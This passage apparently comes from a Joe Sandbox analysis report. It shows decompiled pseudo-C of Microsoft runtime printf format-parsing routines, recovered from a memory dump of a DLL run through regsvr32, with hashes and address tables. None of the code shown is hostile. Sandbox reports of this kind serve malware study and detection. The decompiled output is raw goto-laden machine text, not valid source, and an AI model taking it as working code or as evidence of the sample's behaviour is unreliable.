				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}



                                0x7fef9d3be3a
                                0x7fef9d3be49
                                0x7fef9d3be53
                                0x7fef9d3be61
                                0x7fef9d3be6b
                                0x7fef9d3be71
                                0x7fef9d3be84
                                0x7fef9d3be91
                                0x7fef9d3be9d
                                0x7fef9d3bea5
                                0x7fef9d3beae
                                0x7fef9d3beb2
                                0x7fef9d3bebb
                                0x7fef9d3bed1
                                0x7fef9d3bee2
                                0x7fef9d3bef0
                                0x7fef9d3befc
                                0x7fef9d3bf04
                                0x7fef9d3bf17
                                0x7fef9d3bf28
                                0x7fef9d3bf36
                                0x7fef9d3bf42
                                0x7fef9d3bf4a
                                0x7fef9d3bf5a
                                0x7fef9d3bf6a
                                0x7fef9d3bf7a
                                0x7fef9d3bf8a
                                0x7fef9d3bf9a
                                0x7fef9d3bfaa
                                0x7fef9d3bfac
                                0x7fef9d3bfae
                                0x7fef9d3bfb9
                                0x7fef9d3bfbe
                                0x7fef9d3bfc7
                                0x7fef9d3bfcb
                                0x7fef9d3bfd1
                                0x7fef9d3bfe6
                                0x7fef9d3bff7
                                0x7fef9d3c006
                                0x7fef9d3c02d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                • API String ID: 530996419-3826063230
                                • Opcode ID: ca0a1c3a4d76a0406b352d4f9ca239403a79a6076d76e868b137271f3bc4e837
                                • Instruction ID: 94b803b8bf2c9d0da31cb8fabbb810b13218eabd765851e9cd54d2cd97e7a3d8
                                • Opcode Fuzzy Hash: ca0a1c3a4d76a0406b352d4f9ca239403a79a6076d76e868b137271f3bc4e837
                                • Instruction Fuzzy Hash: 46915E72A0D6C28AE3F18B54E88477EB7E4E381346F601026D7CD87AA9CB7ED5418F11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3DDE0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON
                                Download Yara Rule
                                C-Code - Quality: 84%
                                			E000007FE7FEF9D3DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {

				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}



                                0x7fef9d3dde8
                                0x7fef9d3ddf7
                                0x7fef9d3de01
                                0x7fef9d3de0f
                                0x7fef9d3de19
                                0x7fef9d3de1f
                                0x7fef9d3de32
                                0x7fef9d3de40
                                0x7fef9d3de4c
                                0x7fef9d3de54
                                0x7fef9d3de5d
                                0x7fef9d3de61
                                0x7fef9d3de6a
                                0x7fef9d3de80
                                0x7fef9d3de91
                                0x7fef9d3de9f
                                0x7fef9d3deab
                                0x7fef9d3deb3
                                0x7fef9d3dec6
                                0x7fef9d3ded7
                                0x7fef9d3dee5
                                0x7fef9d3def1
                                0x7fef9d3def9
                                0x7fef9d3df09
                                0x7fef9d3df19
                                0x7fef9d3df29
                                0x7fef9d3df39
                                0x7fef9d3df49
                                0x7fef9d3df59
                                0x7fef9d3df5b
                                0x7fef9d3df5d
                                0x7fef9d3df68
                                0x7fef9d3df6d
                                0x7fef9d3df76
                                0x7fef9d3df7a
                                0x7fef9d3df80
                                0x7fef9d3df95
                                0x7fef9d3dfa6
                                0x7fef9d3dfb5
                                0x7fef9d3dfdc

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                • API String ID: 530996419-4206863317
                                • Opcode ID: 7c5d23002966610aaf37fd2e87aab718b594dfcb558d5e32631a425086473698
                                • Instruction ID: 3115a511369859e1f947b9f2c3204b19b7531d4cbd05c4b67493ff7b1ab56a73
                                • Opcode Fuzzy Hash: 7c5d23002966610aaf37fd2e87aab718b594dfcb558d5e32631a425086473698
                                • Instruction Fuzzy Hash: 5C910C62A0C6C18AE7F08B55E88077EB3E1F385756F600025E6CD87AA8DB7ED855DF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3BCFA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E000007FE7FEF9D3BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t171;
				char* _t191;
				char* _t192;

				_a968 = _a696 & 0x000000ff;
				if (_a968 == 0x20) goto 0xf9d3bd57;
				if (_a968 == 0x23) goto 0xf9d3bd64;
				if (_a968 == 0x2b) goto 0xf9d3bd4a;
				if (_a968 == 0x2d) goto 0xf9d3bd3d;
				if (_a968 == 0x30) goto 0xf9d3bd72;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3bd7d;
				asm("bts eax, 0x7");
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000008;
				if (_a696 != 0x2a) goto 0xf9d3bdbe;
				_t191 =  &_a1112;
				_a88 = E000007FE7FEF9D31E40(_t191);
				if (_a88 >= 0) goto 0xf9d3bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3bdd5;
				_a88 = _t171 + _t191 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t192 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t192);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t171 + _t192 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}






                                0x7fef9d3bd02
                                0x7fef9d3bd11
                                0x7fef9d3bd1b
                                0x7fef9d3bd25
                                0x7fef9d3bd2f
                                0x7fef9d3bd39
                                0x7fef9d3bd3b
                                0x7fef9d3bd44
                                0x7fef9d3bd48
                                0x7fef9d3bd51
                                0x7fef9d3bd55
                                0x7fef9d3bd5e
                                0x7fef9d3bd62
                                0x7fef9d3bd68
                                0x7fef9d3bd70
                                0x7fef9d3bd79
                                0x7fef9d3bd8d
                                0x7fef9d3bd8f
                                0x7fef9d3bd9c
                                0x7fef9d3bda5
                                0x7fef9d3bdae
                                0x7fef9d3bdb8
                                0x7fef9d3bdbc
                                0x7fef9d3bdd1
                                0x7fef9d3bdda
                                0x7fef9d3bdf2
                                0x7fef9d3bdf4
                                0x7fef9d3be01
                                0x7fef9d3be0a
                                0x7fef9d3be0c
                                0x7fef9d3be14
                                0x7fef9d3be29
                                0x7fef9d3be3a
                                0x7fef9d3be49
                                0x7fef9d3be53
                                0x7fef9d3be61
                                0x7fef9d3be6b
                                0x7fef9d3be71
                                0x7fef9d3be84
                                0x7fef9d3be91
                                0x7fef9d3be9d
                                0x7fef9d3bea5
                                0x7fef9d3beae
                                0x7fef9d3beb2
                                0x7fef9d3bebb
                                0x7fef9d3bed1
                                0x7fef9d3bee2
                                0x7fef9d3bef0
                                0x7fef9d3befc
                                0x7fef9d3bf04
                                0x7fef9d3bf17
                                0x7fef9d3bf28
                                0x7fef9d3bf36
                                0x7fef9d3bf42
                                0x7fef9d3bf4a
                                0x7fef9d3bf5a
                                0x7fef9d3bf6a
                                0x7fef9d3bf7a
                                0x7fef9d3bf8a
                                0x7fef9d3bf9a
                                0x7fef9d3bfaa
                                0x7fef9d3bfac
                                0x7fef9d3bfae
                                0x7fef9d3bfb9
                                0x7fef9d3bfbe
                                0x7fef9d3bfc7
                                0x7fef9d3bfcb
                                0x7fef9d3bfd1
                                0x7fef9d3bfe6
                                0x7fef9d3bff7
                                0x7fef9d3c006
                                0x7fef9d3c02d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 530996419-4087627031
                                • Opcode ID: 1de43203eafd45e9ce0d0d64285ee361cc766a04d488c37d7d0694f7340f7322
                                • Instruction ID: 3ab598f7b4fd695a8a70feaac4248e5f119f303646eea4bd5d4eba80b196619f
                                • Opcode Fuzzy Hash: 1de43203eafd45e9ce0d0d64285ee361cc766a04d488c37d7d0694f7340f7322
                                • Instruction Fuzzy Hash: F3514C72A0D6C28AF3F19B64E855BBEBBE4F381345F200126D2D9869A9D77DE540CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3DCA8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E000007FE7FEF9D3DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t171;
				char* _t191;
				char* _t192;

				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0xf9d3dd05;
				if (_a1404 == 0x23) goto 0xf9d3dd12;
				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
				if (_a1404 == 0x2d) goto 0xf9d3dceb;
				if (_a1404 == 0x30) goto 0xf9d3dd20;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3dd2b;
				asm("bts eax, 0x7");
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t191 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t191);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t171 + _t191 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t192 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t192);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t171 + _t192 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                0x7fef9d3dcb0
                                0x7fef9d3dcbf
                                0x7fef9d3dcc9
                                0x7fef9d3dcd3
                                0x7fef9d3dcdd
                                0x7fef9d3dce7
                                0x7fef9d3dce9
                                0x7fef9d3dcf2
                                0x7fef9d3dcf6
                                0x7fef9d3dcff
                                0x7fef9d3dd03
                                0x7fef9d3dd0c
                                0x7fef9d3dd10
                                0x7fef9d3dd16
                                0x7fef9d3dd1e
                                0x7fef9d3dd27
                                0x7fef9d3dd3b
                                0x7fef9d3dd3d
                                0x7fef9d3dd4a
                                0x7fef9d3dd53
                                0x7fef9d3dd5c
                                0x7fef9d3dd66
                                0x7fef9d3dd6a
                                0x7fef9d3dd7f
                                0x7fef9d3dd88
                                0x7fef9d3dda0
                                0x7fef9d3dda2
                                0x7fef9d3ddaf
                                0x7fef9d3ddb8
                                0x7fef9d3ddba
                                0x7fef9d3ddc2
                                0x7fef9d3ddd7
                                0x7fef9d3dde8
                                0x7fef9d3ddf7
                                0x7fef9d3de01
                                0x7fef9d3de0f
                                0x7fef9d3de19
                                0x7fef9d3de1f
                                0x7fef9d3de32
                                0x7fef9d3de40
                                0x7fef9d3de4c
                                0x7fef9d3de54
                                0x7fef9d3de5d
                                0x7fef9d3de61
                                0x7fef9d3de6a
                                0x7fef9d3de80
                                0x7fef9d3de91
                                0x7fef9d3de9f
                                0x7fef9d3deab
                                0x7fef9d3deb3
                                0x7fef9d3dec6
                                0x7fef9d3ded7
                                0x7fef9d3dee5
                                0x7fef9d3def1
                                0x7fef9d3def9
                                0x7fef9d3df09
                                0x7fef9d3df19
                                0x7fef9d3df29
                                0x7fef9d3df39
                                0x7fef9d3df49
                                0x7fef9d3df59
                                0x7fef9d3df5b
                                0x7fef9d3df5d
                                0x7fef9d3df68
                                0x7fef9d3df6d
                                0x7fef9d3df76
                                0x7fef9d3df7a
                                0x7fef9d3df80
                                0x7fef9d3df95
                                0x7fef9d3dfa6
                                0x7fef9d3dfb5
                                0x7fef9d3dfdc

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 530996419-1247675978
                                • Opcode ID: f21bac4cf66fd83060826b10cda673f64da0b58cdc9b26c9e440e84a16dbb144
                                • Instruction ID: f27db2fcef6f8d513c01393a57896d629d62aa2ad95cdf3e250bd1829576e434
                                • Opcode Fuzzy Hash: f21bac4cf66fd83060826b10cda673f64da0b58cdc9b26c9e440e84a16dbb144
                                • Instruction Fuzzy Hash: FA510CB2A0C6C28AE7B09B64E8407BEB7E0F385346F600125D6CA869A8D77DE444DF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3BD82 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                                Download Yara Rule
                                C-Code - Quality: 26%
                                			E000007FE7FEF9D3BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t139;
				char* _t159;
				char* _t160;

				if (_a696 != 0x2a) goto 0xf9d3bdbe;
				_t159 =  &_a1112;
				_a88 = E000007FE7FEF9D31E40(_t159);
				if (_a88 >= 0) goto 0xf9d3bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3bdd5;
				_a88 = _t139 + _t159 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t160 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t160);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t139 + _t160 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}






                                0x7fef9d3bd8d
                                0x7fef9d3bd8f
                                0x7fef9d3bd9c
                                0x7fef9d3bda5
                                0x7fef9d3bdae
                                0x7fef9d3bdb8
                                0x7fef9d3bdbc
                                0x7fef9d3bdd1
                                0x7fef9d3bdda
                                0x7fef9d3bdf2
                                0x7fef9d3bdf4
                                0x7fef9d3be01
                                0x7fef9d3be0a
                                0x7fef9d3be0c
                                0x7fef9d3be14
                                0x7fef9d3be29
                                0x7fef9d3be3a
                                0x7fef9d3be49
                                0x7fef9d3be53
                                0x7fef9d3be61
                                0x7fef9d3be6b
                                0x7fef9d3be71
                                0x7fef9d3be84
                                0x7fef9d3be91
                                0x7fef9d3be9d
                                0x7fef9d3bea5
                                0x7fef9d3beae
                                0x7fef9d3beb2
                                0x7fef9d3bebb
                                0x7fef9d3bed1
                                0x7fef9d3bee2
                                0x7fef9d3bef0
                                0x7fef9d3befc
                                0x7fef9d3bf04
                                0x7fef9d3bf17
                                0x7fef9d3bf28
                                0x7fef9d3bf36
                                0x7fef9d3bf42
                                0x7fef9d3bf4a
                                0x7fef9d3bf5a
                                0x7fef9d3bf6a
                                0x7fef9d3bf7a
                                0x7fef9d3bf8a
                                0x7fef9d3bf9a
                                0x7fef9d3bfaa
                                0x7fef9d3bfac
                                0x7fef9d3bfae
                                0x7fef9d3bfb9
                                0x7fef9d3bfbe
                                0x7fef9d3bfc7
                                0x7fef9d3bfcb
                                0x7fef9d3bfd1
                                0x7fef9d3bfe6
                                0x7fef9d3bff7
                                0x7fef9d3c006
                                0x7fef9d3c02d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2576288505-192189897
                                • Opcode ID: 642eb86adef82c061240f963ecada7643a5a14508ef6930c6b5b5b901d4a1b0a
                                • Instruction ID: e5e15c00c08c12f84a3dc3260eb1d354ac6b745d6778a8e2653f024642a32d0f
                                • Opcode Fuzzy Hash: 642eb86adef82c061240f963ecada7643a5a14508ef6930c6b5b5b901d4a1b0a
                                • Instruction Fuzzy Hash: 0D515E72A0D6C28AE7F0DB24E8947BEBBE4E384355F600126D2CD869A9DB7DD541CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3DD30 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                                Download Yara Rule
                                C-Code - Quality: 26%
                                			E000007FE7FEF9D3DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t139;
				char* _t159;
				char* _t160;

				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t159 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t159);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t139 + _t159 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
